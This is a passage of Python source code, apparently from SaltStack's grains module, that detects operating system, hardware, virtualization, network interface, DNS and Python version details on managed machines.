            'kernelrelease': _clean_value('kernelrelease', osinfo.Version),
            'osversion': _clean_value('osversion', osinfo.Version),
            'osrelease': _clean_value('osrelease', os_release),
            'osservicepack': _clean_value('osservicepack', service_pack),
            'osmanufacturer': _clean_value('osmanufacturer', osinfo.Manufacturer),
            'manufacturer': _clean_value('manufacturer', systeminfo.Manufacturer),
            'productname': _clean_value('productname', systeminfo.Model),
            # bios name had a bunch of whitespace appended to it in my testing
            # 'PhoenixBIOS 4.0 Release 6.0     '
            'biosversion': _clean_value('biosversion', biosinfo.Name.strip()),
            'serialnumber': _clean_value('serialnumber', biosinfo.SerialNumber),
            'osfullname': _clean_value('osfullname', osinfo.Caption),
            'timezone': _clean_value('timezone', timeinfo.Description),
            'windowsdomain': _clean_value('windowsdomain', systeminfo.Domain),
            'motherboard': {
                'productname': _clean_value('motherboard.productname', motherboard['product']),
                'serialnumber': _clean_value('motherboard.serialnumber', motherboard['serial']),
            }
        }
        # test for virtualized environments
        # I only had VMware available so the rest are unvalidated
        if 'VRTUAL' in biosinfo.Version:  # (not a typo)
            grains['virtual'] = 'HyperV'
        elif 'A M I' in biosinfo.Version:
            grains['virtual'] = 'VirtualPC'
        elif 'VMware' in systeminfo.Model:
            grains['virtual'] = 'VMware'
        elif 'VirtualBox' in systeminfo.Model:
            grains['virtual'] = 'VirtualBox'
        elif 'Xen' in biosinfo.Version:
            grains['virtual'] = 'Xen'
            if 'HVM domU' in systeminfo.Model:
                grains['virtual_subtype'] = 'HVM domU'
        elif 'OpenStack' in systeminfo.Model:
            grains['virtual'] = 'OpenStack'
    return grains
def _osx_platform_data():
    '''
    Additional data for macOS systems
    Returns: A dictionary containing values for the following:
        - model_name
        - boot_rom_version
        - smc_version
        - system_serialnumber
    '''
    hardware = __salt__['cmd.run']('system_profiler SPHardwareDataType')

    # Map the system_profiler field labels we care about onto the grain
    # names they populate; anything else in the output is ignored.
    wanted = {
        'Model Name': 'model_name',
        'Boot ROM Version': 'boot_rom_version',
        'SMC Version (system)': 'smc_version',
        'Serial Number (system)': 'system_serialnumber',
    }

    grains = {}
    for line in hardware.splitlines():
        label, _, value = line.partition(': ')
        key = wanted.get(label.strip())
        if key is not None:
            grains[key] = _clean_value(key, value)
    return grains
def id_():
    '''
    Return the minion id from the configuration as the ``id`` grain.
    '''
    minion_id = __opts__.get('id', '')
    return {'id': minion_id}
# Matches a trailing "linux" / "gnu/linux" word so it can be stripped from
# distro names before the short-name lookup below.
_REPLACE_LINUX_RE = re.compile(r'\W(?:gnu/)?linux', re.IGNORECASE)
# This maps (at most) the first ten characters (no spaces, lowercased) of
# 'osfullname' to the 'os' grain that Salt traditionally uses.
# Please see os_data() and _supported_dists.
# If your system is not detecting properly it likely needs an entry here.
# NOTE: longer keys must come before their prefixes (e.g. 'archarm' before
# 'arch') only insofar as lookup is exact-match on the truncated short name.
_OS_NAME_MAP = {
    'redhatente': 'RedHat',
    'gentoobase': 'Gentoo',
    'archarm': 'Arch ARM',
    'arch': 'Arch',
    'debian': 'Debian',
    'raspbian': 'Raspbian',
    'fedoraremi': 'Fedora',
    'chapeau': 'Chapeau',
    'korora': 'Korora',
    'amazonami': 'Amazon',
    'alt': 'ALT',
    'enterprise': 'OEL',
    'oracleserv': 'OEL',
    'cloudserve': 'CloudLinux',
    'cloudlinux': 'CloudLinux',
    'pidora': 'Fedora',
    'scientific': 'ScientificLinux',
    'synology': 'Synology',
    'nilrt': 'NILinuxRT',
    'manjaro': 'Manjaro',
    'antergos': 'Antergos',
    'sles': 'SUSE',
    'slesexpand': 'RES',
    'void': 'Void',
    'linuxmint': 'Mint',
}
# Map the 'os' grain to the 'os_family' grain
# These should always be capitalized entries as the lookup comes
# post-_OS_NAME_MAP. If your system is having trouble with detection, please
# make sure that the 'os' grain is capitalized and working correctly first.
_OS_FAMILY_MAP = {
'Ubuntu': 'Debian',
'Fedora': 'RedHat',
'Chapeau': 'RedHat',
'Korora': 'RedHat',
'FedBerry': 'RedHat',
'CentOS': 'RedHat',
'GoOSe': 'RedHat',
'Scientific': 'RedHat',
'Amazon': 'RedHat',
'CloudLinux': 'RedHat',
'OVS': 'RedHat',
'OEL': 'RedHat',
'XCP': 'RedHat',
'XenServer': 'RedHat',
'RES': 'RedHat',
'Sangoma': 'RedHat',
'Mandrake': 'Mandriva',
'ESXi': 'VMware',
'Mint': 'Debian',
'VMwareESX': 'VMware',
'Bluewhite64': 'Bluewhite',
'Slamd64': 'Slackware',
'SLES': 'Suse',
'SUSE Enterprise Server': 'Suse',
'SUSE Enterprise Server': 'Suse',
'SLED': 'Suse',
'openSUSE': 'Suse',
'SUSE': 'Suse',
'openSUSE Leap': 'Suse',
'openSUSE Tumbleweed': 'Suse',
'SLES_SAP': 'Suse',
'Solaris': 'Solaris',
'SmartOS': 'Solaris',
'OmniOS': 'Solaris',
'OpenIndiana Development': 'Solaris',
'OpenIndiana': 'Solaris',
'OpenSolaris Development': 'Solaris',
'OpenSolaris': 'Solaris',
'Oracle Solaris': 'Solaris',
'Arch ARM': 'Arch',
'Manjaro': 'Arch',
'Antergos': 'Arch',
'ALT': 'RedHat',
'Trisquel': 'Debian',
'GCEL': 'Debian',
'Linaro': 'Debian',
'elementary OS': 'Debian',
'ScientificLinux': 'RedHat',
'Raspbian': 'Debian',
'Devuan': 'Debian',
'antiX': 'Debian',
'NILinuxRT': 'NILinuxRT',
'Void': 'Void',
}
def _linux_bin_exists(binary):
    '''
    Does a binary exist in linux (depends on which, type, or whereis)

    Returns True if *binary* is found on the PATH, False otherwise.
    '''
    # NOTE(review): the `return` inside the try means the loop only ever
    # reaches 'type -ap' when running 'which' raises
    # CommandExecutionError (i.e. `which` itself is missing) -- a non-zero
    # retcode from `which` returns False immediately. Preserved as-is.
    for search_cmd in ('which', 'type -ap'):
        try:
            return __salt__['cmd.retcode'](
                '{0} {1}'.format(search_cmd, binary)
            ) == 0
        except salt.exceptions.CommandExecutionError:
            pass
    # Last resort: `whereis -b` prints "name:" plus any matches, so more
    # than one whitespace-separated token means the binary was found.
    try:
        return len(__salt__['cmd.run_all'](
            'whereis -b {0}'.format(binary)
        )['stdout'].split()) > 1
    except salt.exceptions.CommandExecutionError:
        return False
def _get_interfaces():
    '''
    Provide a dict of the connected interfaces and their ip addresses

    The result is cached in the module-level _INTERFACES dict so the
    network is only interrogated once per process.
    '''
    global _INTERFACES
    if _INTERFACES:
        return _INTERFACES
    _INTERFACES = salt.utils.network.interfaces()
    return _INTERFACES
def _parse_os_release():
    '''
    Parse /etc/os-release and return a parameter dictionary

    See http://www.freedesktop.org/software/systemd/man/os-release.html
    for specification of the file format. Falls back to
    /usr/lib/os-release when /etc/os-release does not exist.
    '''
    filename = '/etc/os-release'
    if not os.path.isfile(filename):
        filename = '/usr/lib/os-release'

    # KEY=value with optional single or double quotes around the value.
    regex = re.compile('^([\\w]+)=(?:\'|")?(.*?)(?:\'|")?$')
    data = {}
    with salt.utils.fopen(filename) as ifile:
        for line in ifile:
            match = regex.match(line.strip())
            if not match:
                continue
            # Shell special characters ("$", quotes, backslash, backtick)
            # are escaped with backslashes
            data[match.group(1)] = re.sub(r'\\([$"\'\\`])', r'\1', match.group(2))
    return data
def os_data():
    '''
    Return grains pertaining to the operating system

    Dispatches on the kernel reported by platform.uname(): proxy,
    Windows, Linux, SunOS, VMkernel (ESXi), Darwin (macOS), and the BSDs
    each take a different branch. Populates (among others) the os,
    os_family, osrelease, osrelease_info, osarch, osfinger and init
    grains.
    '''
    grains = {
        'num_gpus': 0,
        'gpus': [],
    }
    # Windows Server 2008 64-bit
    # ('Windows', 'MINIONNAME', '2008ServerR2', '6.1.7601', 'AMD64',
    #  'Intel64 Family 6 Model 23 Stepping 6, GenuineIntel')
    # Ubuntu 10.04
    # ('Linux', 'MINIONNAME', '2.6.32-38-server',
    # '#83-Ubuntu SMP Wed Jan 4 11:26:59 UTC 2012', 'x86_64', '')
    # pylint: disable=unpacking-non-sequence
    (grains['kernel'], grains['nodename'],
     grains['kernelrelease'], version, grains['cpuarch'], _) = platform.uname()
    # pylint: enable=unpacking-non-sequence
    if salt.utils.is_proxy():
        grains['kernel'] = 'proxy'
        grains['kernelrelease'] = 'proxy'
        grains['osrelease'] = 'proxy'
        grains['os'] = 'proxy'
        grains['os_family'] = 'proxy'
        grains['osfullname'] = 'proxy'
    elif salt.utils.is_windows():
        grains['os'] = 'Windows'
        grains['os_family'] = 'Windows'
        grains.update(_memdata(grains))
        grains.update(_windows_platform_data())
        grains.update(_windows_cpudata())
        grains.update(_windows_virtual(grains))
        grains.update(_ps(grains))
        # Server releases look like '2012ServerR2'; split out the numeric
        # part(s) to build osrelease_info.
        if 'Server' in grains['osrelease']:
            osrelease_info = grains['osrelease'].split('Server', 1)
            osrelease_info[1] = osrelease_info[1].lstrip('R')
        else:
            osrelease_info = grains['osrelease'].split('.')
        for idx, value in enumerate(osrelease_info):
            if not value.isdigit():
                continue
            osrelease_info[idx] = int(value)
        grains['osrelease_info'] = tuple(osrelease_info)
        grains['osfinger'] = '{os}-{ver}'.format(
            os=grains['os'],
            ver=grains['osrelease'])
        grains['init'] = 'Windows'
        return grains
    elif salt.utils.is_linux():
        # Add SELinux grain, if you have it
        if _linux_bin_exists('selinuxenabled'):
            grains['selinux'] = {}
            grains['selinux']['enabled'] = __salt__['cmd.retcode'](
                'selinuxenabled'
            ) == 0
            if _linux_bin_exists('getenforce'):
                grains['selinux']['enforced'] = __salt__['cmd.run'](
                    'getenforce'
                ).strip()
        # Add systemd grain, if you have it
        if _linux_bin_exists('systemctl') and _linux_bin_exists('localectl'):
            grains['systemd'] = {}
            systemd_info = __salt__['cmd.run'](
                'systemctl --version'
            ).splitlines()
            grains['systemd']['version'] = systemd_info[0].split()[1]
            grains['systemd']['features'] = systemd_info[1]
        # Add init grain
        grains['init'] = 'unknown'
        try:
            os.stat('/run/systemd/system')
            grains['init'] = 'systemd'
        except (OSError, IOError):
            # Fall back to inspecting PID 1's command line / binary.
            if os.path.exists('/proc/1/cmdline'):
                with salt.utils.fopen('/proc/1/cmdline') as fhr:
                    init_cmdline = fhr.read().replace('\x00', ' ').split()
                init_bin = salt.utils.which(init_cmdline[0])
                if init_bin is not None and init_bin.endswith('bin/init'):
                    supported_inits = (six.b('upstart'), six.b('sysvinit'), six.b('systemd'))
                    edge_len = max(len(x) for x in supported_inits) - 1
                    try:
                        buf_size = __opts__['file_buffer_size']
                    except KeyError:
                        # Default to the value of file_buffer_size for the minion
                        buf_size = 262144
                    try:
                        # Scan the init binary in chunks, carrying an
                        # `edge` overlap so matches spanning a chunk
                        # boundary are not missed.
                        with salt.utils.fopen(init_bin, 'rb') as fp_:
                            buf = True
                            edge = six.b('')
                            buf = fp_.read(buf_size).lower()
                            while buf:
                                buf = edge + buf
                                for item in supported_inits:
                                    if item in buf:
                                        if six.PY3:
                                            item = item.decode('utf-8')
                                        grains['init'] = item
                                        buf = six.b('')
                                        break
                                edge = buf[-edge_len:]
                                buf = fp_.read(buf_size).lower()
                    except (IOError, OSError) as exc:
                        log.error(
                            'Unable to read from init_bin ({0}): {1}'
                            .format(init_bin, exc)
                        )
                elif salt.utils.which('supervisord') in init_cmdline:
                    grains['init'] = 'supervisord'
                elif init_cmdline == ['runit']:
                    grains['init'] = 'runit'
                else:
                    log.info(
                        'Could not determine init system from command line: ({0})'
                        .format(' '.join(init_cmdline))
                    )
        # Add lsb grains on any distro with lsb-release
        try:
            import lsb_release  # pylint: disable=import-error
            release = lsb_release.get_distro_information()
            for key, value in six.iteritems(release):
                key = key.lower()
                lsb_param = 'lsb_{0}{1}'.format(
                    '' if key.startswith('distrib_') else 'distrib_',
                    key
                )
                grains[lsb_param] = value
        # Catch a NameError to workaround possible breakage in lsb_release
        # See https://github.com/saltstack/salt/issues/37867
        except (ImportError, NameError):
            # if the python library isn't available, default to regex
            if os.path.isfile('/etc/lsb-release'):
                # Matches any possible format:
                #     DISTRIB_ID="Ubuntu"
                #     DISTRIB_ID='Mageia'
                #     DISTRIB_ID=Fedora
                #     DISTRIB_RELEASE='10.10'
                #     DISTRIB_CODENAME='squeeze'
                #     DISTRIB_DESCRIPTION='Ubuntu 10.10'
                regex = re.compile((
                    '^(DISTRIB_(?:ID|RELEASE|CODENAME|DESCRIPTION))=(?:\'|")?'
                    '([\\w\\s\\.\\-_]+)(?:\'|")?'
                ))
                with salt.utils.fopen('/etc/lsb-release') as ifile:
                    for line in ifile:
                        match = regex.match(line.rstrip('\n'))
                        if match:
                            # Adds:
                            #   lsb_distrib_{id,release,codename,description}
                            grains[
                                'lsb_{0}'.format(match.groups()[0].lower())
                            ] = match.groups()[1].rstrip()
            if grains.get('lsb_distrib_description', '').lower().startswith('antergos'):
                # Antergos incorrectly configures their /etc/lsb-release,
                # setting the DISTRIB_ID to "Arch". This causes the "os" grain
                # to be incorrectly set to "Arch".
                grains['osfullname'] = 'Antergos Linux'
            elif 'lsb_distrib_id' not in grains:
                if os.path.isfile('/etc/os-release') or os.path.isfile('/usr/lib/os-release'):
                    os_release = _parse_os_release()
                    if 'NAME' in os_release:
                        grains['lsb_distrib_id'] = os_release['NAME'].strip()
                    if 'VERSION_ID' in os_release:
                        grains['lsb_distrib_release'] = os_release['VERSION_ID']
                    if 'PRETTY_NAME' in os_release:
                        grains['lsb_distrib_codename'] = os_release['PRETTY_NAME']
                    if 'CPE_NAME' in os_release:
                        if ":suse:" in os_release['CPE_NAME'] or ":opensuse:" in os_release['CPE_NAME']:
                            grains['os'] = "SUSE"
                            # openSUSE `osfullname` grain normalization
                            if os_release.get("NAME") == "openSUSE Leap":
                                grains['osfullname'] = "Leap"
                            elif os_release.get("VERSION") == "Tumbleweed":
                                grains['osfullname'] = os_release["VERSION"]
                elif os.path.isfile('/etc/SuSE-release'):
                    grains['lsb_distrib_id'] = 'SUSE'
                    version = ''
                    patch = ''
                    with salt.utils.fopen('/etc/SuSE-release') as fhr:
                        for line in fhr:
                            if 'enterprise' in line.lower():
                                grains['lsb_distrib_id'] = 'SLES'
                                grains['lsb_distrib_codename'] = re.sub(r'\(.+\)', '', line).strip()
                            elif 'version' in line.lower():
                                version = re.sub(r'[^0-9]', '', line)
                            elif 'patchlevel' in line.lower():
                                patch = re.sub(r'[^0-9]', '', line)
                    grains['lsb_distrib_release'] = version
                    if patch:
                        grains['lsb_distrib_release'] += '.' + patch
                        patchstr = 'SP' + patch
                        # NOTE(review): if the file has a patchlevel line but
                        # no 'enterprise' line, 'lsb_distrib_codename' was
                        # never set and this lookup would KeyError -- confirm
                        # against real /etc/SuSE-release contents.
                        if grains['lsb_distrib_codename'] and patchstr not in grains['lsb_distrib_codename']:
                            grains['lsb_distrib_codename'] += ' ' + patchstr
                    if not grains['lsb_distrib_codename']:
                        grains['lsb_distrib_codename'] = 'n.a'
                elif os.path.isfile('/etc/altlinux-release'):
                    # ALT Linux
                    grains['lsb_distrib_id'] = 'altlinux'
                    with salt.utils.fopen('/etc/altlinux-release') as ifile:
                        # This file is symlinked to from:
                        #     /etc/fedora-release
                        #     /etc/redhat-release
                        #     /etc/system-release
                        for line in ifile:
                            # ALT Linux Sisyphus (unstable)
                            comps = line.split()
                            if comps[0] == 'ALT':
                                grains['lsb_distrib_release'] = comps[2]
                                grains['lsb_distrib_codename'] = \
                                    comps[3].replace('(', '').replace(')', '')
                elif os.path.isfile('/etc/centos-release'):
                    # CentOS Linux
                    grains['lsb_distrib_id'] = 'CentOS'
                    with salt.utils.fopen('/etc/centos-release') as ifile:
                        for line in ifile:
                            # Need to pull out the version and codename
                            # in the case of custom content in /etc/centos-release
                            find_release = re.compile(r'\d+\.\d+')
                            find_codename = re.compile(r'(?<=\()(.*?)(?=\))')
                            release = find_release.search(line)
                            codename = find_codename.search(line)
                            if release is not None:
                                grains['lsb_distrib_release'] = release.group()
                            if codename is not None:
                                grains['lsb_distrib_codename'] = codename.group()
                elif os.path.isfile('/etc.defaults/VERSION') \
                        and os.path.isfile('/etc.defaults/synoinfo.conf'):
                    grains['osfullname'] = 'Synology'
                    with salt.utils.fopen('/etc.defaults/VERSION', 'r') as fp_:
                        synoinfo = {}
                        for line in fp_:
                            try:
                                key, val = line.rstrip('\n').split('=')
                            except ValueError:
                                continue
                            if key in ('majorversion', 'minorversion',
                                       'buildnumber'):
                                synoinfo[key] = val.strip('"')
                        if len(synoinfo) != 3:
                            log.warning(
                                'Unable to determine Synology version info. '
                                'Please report this, as it is likely a bug.'
                            )
                        else:
                            grains['osrelease'] = (
                                '{majorversion}.{minorversion}-{buildnumber}'
                                .format(**synoinfo)
                            )
        # Use the already intelligent platform module to get distro info
        # (though apparently it's not intelligent enough to strip quotes)
        (osname, osrelease, oscodename) = \
            [x.strip('"').strip("'") for x in
             platform.linux_distribution(supported_dists=_supported_dists)]
        # Try to assign these three names based on the lsb info, they tend to
        # be more accurate than what python gets from /etc/DISTRO-release.
        # It's worth noting that Ubuntu has patched their Python distribution
        # so that platform.linux_distribution() does the /etc/lsb-release
        # parsing, but we do it anyway here for the sake for full portability.
        if 'osfullname' not in grains:
            grains['osfullname'] = \
                grains.get('lsb_distrib_id', osname).strip()
        if 'osrelease' not in grains:
            # NOTE: This is a workaround for CentOS 7 os-release bug
            # https://bugs.centos.org/view.php?id=8359
            # /etc/os-release contains no minor distro release number so we fall back to parse
            # /etc/centos-release file instead.
            # Commit introducing this comment should be reverted after the upstream bug is released.
            if 'CentOS Linux 7' in grains.get('lsb_distrib_codename', ''):
                grains.pop('lsb_distrib_release', None)
            grains['osrelease'] = \
                grains.get('lsb_distrib_release', osrelease).strip()
        grains['oscodename'] = grains.get('lsb_distrib_codename', '').strip() or oscodename
        if 'Red Hat' in grains['oscodename']:
            grains['oscodename'] = oscodename
        distroname = _REPLACE_LINUX_RE.sub('', grains['osfullname']).strip()
        # return the first ten characters with no spaces, lowercased
        shortname = distroname.replace(' ', '').lower()[:10]
        # this maps the long names from the /etc/DISTRO-release files to the
        # traditional short names that Salt has used.
        if 'os' not in grains:
            grains['os'] = _OS_NAME_MAP.get(shortname, distroname)
        grains.update(_linux_cpudata())
        grains.update(_linux_gpu_data())
    elif grains['kernel'] == 'SunOS':
        if salt.utils.is_smartos():
            # See https://github.com/joyent/smartos-live/issues/224
            uname_v = os.uname()[3]  # format: joyent_20161101T004406Z
            uname_v = uname_v[uname_v.index('_')+1:]
            grains['os'] = grains['osfullname'] = 'SmartOS'
            # store a parsed version of YYYY.MM.DD as osrelease
            grains['osrelease'] = ".".join([
                uname_v.split('T')[0][0:4],
                uname_v.split('T')[0][4:6],
                uname_v.split('T')[0][6:8],
            ])
            # store an untouched copy of the timestamp in osrelease_stamp
            grains['osrelease_stamp'] = uname_v
            if salt.utils.is_smartos_globalzone():
                grains.update(_smartos_computenode_data())
        elif os.path.isfile('/etc/release'):
            with salt.utils.fopen('/etc/release', 'r') as fp_:
                rel_data = fp_.read()
                try:
                    release_re = re.compile(
                        r'((?:Open|Oracle )?Solaris|OpenIndiana|OmniOS) (Development)?'
                        r'\s*(\d+\.?\d*|v\d+)\s?[A-Z]*\s?(r\d+|\d+\/\d+|oi_\S+|snv_\S+)?'
                    )
                    osname, development, osmajorrelease, osminorrelease = \
                        release_re.search(rel_data).groups()
                except AttributeError:
                    # Set a blank osrelease grain and fallback to 'Solaris'
                    # as the 'os' grain.
                    grains['os'] = grains['osfullname'] = 'Solaris'
                    grains['osrelease'] = ''
                else:
                    if development is not None:
                        osname = ' '.join((osname, development))
                    uname_v = os.uname()[3]
                    grains['os'] = grains['osfullname'] = osname
                    if osname in ['Oracle Solaris'] and uname_v.startswith(osmajorrelease):
                        # Oracle Solaris 11 and up have minor version in uname
                        grains['osrelease'] = uname_v
                    elif osname in ['OmniOS']:
                        # OmniOS
                        osrelease = []
                        osrelease.append(osmajorrelease[1:])
                        osrelease.append(osminorrelease[1:])
                        grains['osrelease'] = ".".join(osrelease)
                        grains['osrelease_stamp'] = uname_v
                    else:
                        # Sun Solaris 10 and earlier/comparable
                        osrelease = []
                        osrelease.append(osmajorrelease)
                        if osminorrelease:
                            osrelease.append(osminorrelease)
                        grains['osrelease'] = ".".join(osrelease)
                        grains['osrelease_stamp'] = uname_v
        grains.update(_sunos_cpudata())
    elif grains['kernel'] == 'VMkernel':
        grains['os'] = 'ESXi'
    elif grains['kernel'] == 'Darwin':
        osrelease = __salt__['cmd.run']('sw_vers -productVersion')
        osname = __salt__['cmd.run']('sw_vers -productName')
        osbuild = __salt__['cmd.run']('sw_vers -buildVersion')
        grains['os'] = 'MacOS'
        grains['os_family'] = 'MacOS'
        grains['osfullname'] = "{0} {1}".format(osname, osrelease)
        grains['osrelease'] = osrelease
        grains['osbuild'] = osbuild
        grains['init'] = 'launchd'
        grains.update(_bsd_cpudata(grains))
        grains.update(_osx_gpudata())
        grains.update(_osx_platform_data())
    else:
        grains['os'] = grains['kernel']
    if grains['kernel'] == 'FreeBSD':
        try:
            grains['osrelease'] = __salt__['cmd.run']('freebsd-version -u').split('-')[0]
        except salt.exceptions.CommandExecutionError:
            # freebsd-version was introduced in 10.0.
            # derive osrelease from kernelversion prior to that
            grains['osrelease'] = grains['kernelrelease'].split('-')[0]
        grains.update(_bsd_cpudata(grains))
    if grains['kernel'] in ('OpenBSD', 'NetBSD'):
        grains.update(_bsd_cpudata(grains))
        grains['osrelease'] = grains['kernelrelease'].split('-')[0]
        if grains['kernel'] == 'NetBSD':
            grains.update(_netbsd_gpu_data())
    if not grains['os']:
        grains['os'] = 'Unknown {0}'.format(grains['kernel'])
        grains['os_family'] = 'Unknown'
    else:
        # this assigns family names based on the os name
        # family defaults to the os name if not found
        grains['os_family'] = _OS_FAMILY_MAP.get(grains['os'],
                                                 grains['os'])
    # Build the osarch grain. This grain will be used for platform-specific
    # considerations such as package management. Fall back to the CPU
    # architecture.
    if grains.get('os_family') == 'Debian':
        osarch = __salt__['cmd.run']('dpkg --print-architecture').strip()
    elif grains.get('os_family') == 'RedHat':
        osarch = __salt__['cmd.run']('rpm --eval %{_host_cpu}').strip()
    elif grains.get('os_family') == 'NILinuxRT':
        archinfo = {}
        for line in __salt__['cmd.run']('opkg print-architecture').splitlines():
            if line.startswith('arch'):
                _, arch, priority = line.split()
                archinfo[arch.strip()] = int(priority.strip())
        # Return osarch in priority order (higher to lower)
        osarch = sorted(archinfo, key=archinfo.get, reverse=True)
    else:
        osarch = grains['cpuarch']
    grains['osarch'] = osarch
    grains.update(_memdata(grains))
    # Get the hardware and bios data
    grains.update(_hw_data(grains))
    # Get zpool data
    grains.update(_zpool_data(grains))
    # Load the virtual machine info
    grains.update(_virtual(grains))
    grains.update(_ps(grains))
    if grains.get('osrelease', ''):
        osrelease_info = grains['osrelease'].split('.')
        for idx, value in enumerate(osrelease_info):
            if not value.isdigit():
                continue
            osrelease_info[idx] = int(value)
        grains['osrelease_info'] = tuple(osrelease_info)
        grains['osmajorrelease'] = str(grains['osrelease_info'][0])  # This will be an integer in the two releases
        os_name = grains['os' if grains.get('os') in (
            'FreeBSD', 'OpenBSD', 'NetBSD', 'Mac', 'Raspbian') else 'osfullname']
        grains['osfinger'] = '{0}-{1}'.format(
            os_name, grains['osrelease'] if os_name in ('Ubuntu',) else grains['osrelease_info'][0])
    return grains
def locale_info():
    '''
    Provides
        defaultlanguage
        defaultencoding
    '''
    grains = {'locale_info': {}}
    if salt.utils.is_proxy():
        return grains
    try:
        language, encoding = locale.getdefaultlocale()
    except Exception:
        # locale.getdefaultlocale can ValueError!! Catch anything else it
        # might do, per #2205
        language, encoding = 'unknown', 'unknown'
    grains['locale_info']['defaultlanguage'] = language
    grains['locale_info']['defaultencoding'] = encoding
    grains['locale_info']['detectedencoding'] = __salt_system_encoding__
    return grains
def hostname():
    '''
    Return fqdn, hostname, domainname

    Caches the resolved FQDN in the module-level __FQDN__ so the (possibly
    slow) lookup only happens once per process.
    '''
    # This is going to need some work
    # Provides:
    #   fqdn
    #   host
    #   localhost
    #   domain
    global __FQDN__
    grains = {}

    if salt.utils.is_proxy():
        return grains

    grains['localhost'] = socket.gethostname()
    if __FQDN__ is None:
        __FQDN__ = salt.utils.network.get_fqhostname()

    # On some distros (notably FreeBSD) if there is no hostname set
    # salt.utils.network.get_fqhostname() will return None.
    # In this case we punt and log a message at error level, but force the
    # hostname and domain to be localhost.localdomain
    # Otherwise we would stacktrace below
    if __FQDN__ is None:   # still!
        log.error('Having trouble getting a hostname. Does this machine have its hostname and domain set properly?')
        __FQDN__ = 'localhost.localdomain'

    grains['fqdn'] = __FQDN__
    # partition('.')[::2] yields (head, tail-after-first-dot), so everything
    # before the first dot is the host and the remainder is the domain.
    (grains['host'], grains['domain']) = grains['fqdn'].partition('.')[::2]
    return grains
def append_domain():
    '''
    Return the append_domain config value as a grain, if one is set.
    '''
    if salt.utils.is_proxy():
        return {}
    ret = {}
    if 'append_domain' in __opts__:
        ret['append_domain'] = __opts__['append_domain']
    return ret
def ip_fqdn():
    '''
    Return ip address and FQDN grains
    '''
    if salt.utils.is_proxy():
        return {}

    ret = {
        'ipv4': salt.utils.network.ip_addrs(include_loopback=True),
        'ipv6': salt.utils.network.ip_addrs6(include_loopback=True),
    }

    _fqdn = hostname()['fqdn']
    for socket_type, ipv_num in ((socket.AF_INET, '4'), (socket.AF_INET6, '6')):
        key = 'fqdn_ip' + ipv_num
        if not ret['ipv' + ipv_num]:
            # No addresses of this family at all; skip the DNS lookup.
            ret[key] = []
            continue
        try:
            info = socket.getaddrinfo(_fqdn, None, socket_type)
            ret[key] = list(set(item[4][0] for item in info))
        except socket.error:
            ret[key] = []
    return ret
def ip_interfaces():
    '''
    Provide a dict of the connected interfaces and their ip addresses
    The addresses will be passed as a list for each interface
    '''
    # Provides:
    #   ip_interfaces
    if salt.utils.is_proxy():
        return {}

    ifaces = _get_interfaces()
    ret = {}
    for name, info in ifaces.items():
        # Collect v4, v6 and secondary addresses in that order, skipping
        # entries without an 'address' field.
        ret[name] = [entry['address']
                     for group in ('inet', 'inet6', 'secondary')
                     for entry in info.get(group, [])
                     if 'address' in entry]
    return {'ip_interfaces': ret}
def ip4_interfaces():
    '''
    Provide a dict of the connected interfaces and their ip4 addresses
    The addresses will be passed as a list for each interface
    '''
    # Provides:
    #   ip_interfaces
    if salt.utils.is_proxy():
        return {}

    ifaces = _get_interfaces()
    ret = {}
    for name, info in ifaces.items():
        # IPv4 primary addresses first, then any secondaries.
        ret[name] = [entry['address']
                     for group in ('inet', 'secondary')
                     for entry in info.get(group, [])
                     if 'address' in entry]
    return {'ip4_interfaces': ret}
def ip6_interfaces():
    '''
    Provide a dict of the connected interfaces and their ip6 addresses
    The addresses will be passed as a list for each interface
    '''
    # Provides:
    #   ip_interfaces
    if salt.utils.is_proxy():
        return {}

    ifaces = _get_interfaces()
    ret = {}
    for name, info in ifaces.items():
        # IPv6 primary addresses first, then any secondaries.
        ret[name] = [entry['address']
                     for group in ('inet6', 'secondary')
                     for entry in info.get(group, [])
                     if 'address' in entry]
    return {'ip6_interfaces': ret}
def hwaddr_interfaces():
    '''
    Provide a dict of the connected interfaces and their
    hw addresses (Mac Address)
    '''
    # Provides:
    #   hwaddr_interfaces
    mapping = {name: info['hwaddr']
               for name, info in _get_interfaces().items()
               if 'hwaddr' in info}
    return {'hwaddr_interfaces': mapping}
def dns():
    '''
    Parse the resolver configuration file

    .. versionadded:: 2016.3.0
    '''
    # Provides:
    #   dns
    if salt.utils.is_windows() or 'proxyminion' in __opts__:
        return {}

    resolv = salt.utils.dns.parse_resolv()
    # Normalize the parsed address objects into plain strings.
    for key in ('nameservers', 'ip4_nameservers', 'ip6_nameservers',
                'sortlist'):
        if key in resolv:
            resolv[key] = [str(entry) for entry in resolv[key]]
    if not resolv:
        return {}
    return {'dns': resolv}
def get_machine_id():
    '''
    Provide the machine-id
    '''
    # Provides:
    #   machine-id
    # Prefer /etc/machine-id; fall back to the legacy dbus location.
    for location in ('/etc/machine-id', '/var/lib/dbus/machine-id'):
        if os.path.exists(location):
            with salt.utils.fopen(location) as machineid:
                return {'machine_id': machineid.read().strip()}
    return {}
def path():
    '''
    Return the PATH environment variable as the ``path`` grain.
    '''
    # Provides:
    #   path
    environ_path = os.environ.get('PATH', '')
    return {'path': environ_path.strip()}
def pythonversion():
    '''
    Return the Python version as a list of version_info components.
    '''
    # Provides:
    #   pythonversion
    info = sys.version_info
    return {'pythonversion': [component for component in info]}
def pythonpath():
    '''
    Return the interpreter's module search path (sys.path).
    '''
    # Provides:
    #   pythonpath
    return dict(pythonpath=sys.path)
def pythonexecutable():
    '''
    Return the path of the Python interpreter currently in use.
    '''
    # Provides:
    #   pythonexecutable
    return dict(pythonexecutable=sys.executable)
def saltpath():
    '''
    Return the path of the salt module

    Computed as the directory containing this module's parent package.
    '''
    # Provides:
    #   saltpath
    parent_dir = os.path.abspath(os.path.join(__file__, os.path.pardir))
    return {'saltpath': os.path.dirname(parent_dir)}
def saltversion():
    '''
    Return the version of salt
    '''
    # Provides:
    #   saltversion
    from salt.version import __version__ as _salt_version
    return {'saltversion': _salt_version}
def zmqversion():
    '''
    Return the zeromq version, or an empty dict when zmq is unavailable.
    '''
    # Provides:
    #   zmqversion
    try:
        import zmq
    except ImportError:
        return {}
    return {'zmqversion': zmq.zmq_version()}  # pylint: disable=no-member
def saltversioninfo():
    '''
    Return the version_info of salt

     .. versionadded:: 0.17.0
    '''
    # Provides:
    #   saltversioninfo
    from salt.version import __version_info__ as _version_info
    return {'saltversioninfo': list(_version_info)}
def _hw_data(osdata):
    '''
    Get system specific hardware data from dmidecode

    Provides
        biosversion
        productname
        manufacturer
        serialnumber
        biosreleasedate
        uuid

    .. versionadded:: 0.9.5

    :param osdata: the grains collected so far; only ``kernel`` and
